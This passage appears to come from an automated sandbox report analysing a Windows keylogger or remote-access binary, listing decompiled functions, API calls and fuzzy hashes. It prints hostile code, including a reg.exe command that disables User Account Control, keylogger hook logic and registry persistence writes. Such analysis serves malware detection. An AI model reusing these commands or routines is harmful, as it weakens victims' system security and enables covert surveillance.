				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                        0x0041288d
                                        0x00412896
                                        0x00412897
                                        0x0041289b
                                        0x004128a1
                                        0x004128a3
                                        0x004128a9
                                        0x004128ab
                                        0x004128b5
                                        0x004128ba
                                        0x004128bd
                                        0x004128c3
                                        0x004128cb
                                        0x004128ce
                                        0x004128d9
                                        0x004128df
                                        0x004128e6
                                        0x004128f3
                                        0x004128fc
                                        0x00412909

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 391609400-0
                                        • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                        • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413B0F, Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00413B0F() {
				struct tagMSG _v32;
				char _v292;
				int _t15;

				GetModuleFileNameA(0,  &_v292, 0x104);
				 *0x41c204 = E00413BC8();
				0x41c200->cbSize = 0x58;
				 *0x41c208 = 1;
				 *0x41c210 = 0x401;
				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
				lstrcpynA(0x41c218,  *0x41b160, 0x40);
				 *0x41c20c = 7;
				Shell_NotifyIconA(0, 0x41c200);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v32);
				while(1) {
					_t15 = GetMessageA();
					if(_t15 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v32);
				}
				return _t15;
			}






                                        0x00413b29
                                        0x00413b34
                                        0x00413b42
                                        0x00413b4c
                                        0x00413b56
                                        0x00413b68
                                        0x00413b78
                                        0x00413b84
                                        0x00413b8e
                                        0x00413b9a
                                        0x00413b9b
                                        0x00413b9f
                                        0x00413ba0
                                        0x00413ba1
                                        0x00413ba1
                                        0x00413ba5
                                        0x00000000
                                        0x00000000
                                        0x00413bab
                                        0x00413bb5
                                        0x00413bbb
                                        0x00413bbc
                                        0x00413bc0
                                        0x00413bc1
                                        0x00413bc1
                                        0x00413bc7

                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                          • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                          • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                          • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                        • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                        • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                        • GetMessageA.USER32 ref: 00413BA1
                                        • TranslateMessage.USER32(?), ref: 00413BAB
                                        • DispatchMessageA.USER32 ref: 00413BB5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID:
                                        • API String ID: 1970332568-0
                                        • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                        • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                        • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                        • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                        • String ID: Offline Keylogger Stopped$[INFO]
                                        • API String ID: 2222684746-1731565019
                                        • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                        • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B708, Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8);
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13);
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                        0x0040b715
                                        0x0040b71d
                                        0x0040b76a
                                        0x0040b773
                                        0x0040b71f
                                        0x0040b724
                                        0x0040b72e
                                        0x0040b735
                                        0x0040b741
                                        0x0040b74c
                                        0x0040b754
                                        0x0040b756
                                        0x0040b756
                                        0x0040b75b
                                        0x0040b766
                                        0x0040b766

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                        • RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                        • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 2159132150-0
                                        • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                        • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A0E1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                        0x0040a0ed
                                        0x0040a0f1
                                        0x0040a0f6
                                        0x0040a0fd
                                        0x0040a0fe
                                        0x0040a0ff
                                        0x0040a100
                                        0x0040a11f
                                        0x0040a12e
                                        0x0040a138

                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                        • CloseHandle.KERNEL32(?), ref: 0040A12E
                                        • CloseHandle.KERNEL32(?), ref: 0040A133
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                        • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                        • D, xrefs: 0040A0F6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                        • API String ID: 2922976086-1747066916
                                        • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                        • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004127F5, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2478582372-0
                                        • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                        • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                        • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                        • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412795, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                        • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 914748455-0
                                        • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                        • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                        • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                        • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x0
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t21);
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                        0x00405532
                                        0x00405538
                                        0x00405540
                                        0x00405542
                                        0x0040554a
                                        0x0040554d
                                        0x00405562
                                        0x00405569
                                        0x0040556f
                                        0x00405574
                                        0x004055b6
                                        0x00405576
                                        0x00405578
                                        0x00405580
                                        0x00405586
                                        0x00405595
                                        0x00405599
                                        0x0040559d
                                        0x0040559d
                                        0x004055a7
                                        0x004055a7
                                        0x004055ae
                                        0x004055ae
                                        0x004055b9
                                        0x004055c2
                                        0x004055d6
                                        0x00000000
                                        0x004055de
                                        0x004055c2
                                        0x004055e6

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                        • CreateFileW.KERNEL32(00000000), ref: 00405569
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                        • Sleep.KERNEL32(00002710), ref: 004055A7
                                        • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                        • String ID:
                                        • API String ID: 3524115370-0
                                        • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                        • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00412DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                        0x00412de3
                                        0x00412dff
                                        0x00412e04
                                        0x00412e16
                                        0x00412e1a
                                        0x00412e23
                                        0x00412e29
                                        0x00412e2c
                                        0x00412e3d
                                        0x00412e3f
                                        0x00412e3f
                                        0x00412e42
                                        0x00000000
                                        0x00412e48
                                        0x00000000

                                        APIs
                                        • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                        • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2061410294-0
                                        • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                        • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413BC8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 71%
                                        			E00413BC8() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				struct HWND__* _t21;
				signed int _t23;

				_t23 = 0xb;
				memset( &(_v68.style), 0, _t23 << 2);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_v68.cbSize = 0x30;
				asm("movsb");
				_v68.lpszClassName =  &_v20;
				_v68.style = 0;
				_v68.lpfnWndProc = E00413C3F;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.lpszMenuName = 0;
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t21 == 0) {
					GetLastError();
					goto L3;
				}
				return _t21;
			}







